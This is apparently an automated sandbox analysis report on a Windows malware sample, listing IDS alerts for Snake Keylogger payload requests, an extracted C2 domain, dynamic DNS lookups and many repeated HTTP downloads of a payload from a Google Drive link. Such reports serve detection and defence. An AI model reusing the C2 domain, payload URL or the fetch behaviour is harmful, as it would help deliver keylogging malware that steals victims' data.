                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]4_2_6C5EDE44
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 67MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.9:49797 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49865 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49868 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49802 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49804 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49855 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49825 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49813 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49788 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49824 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49891 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49842 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49902 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49789 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49912 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49856 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49814 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49901 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49844 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49890 -> 172.217.18.14:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49910 -> 172.217.18.14:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C914B54 URLDownloadToFileW,4_2_6C914B54
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
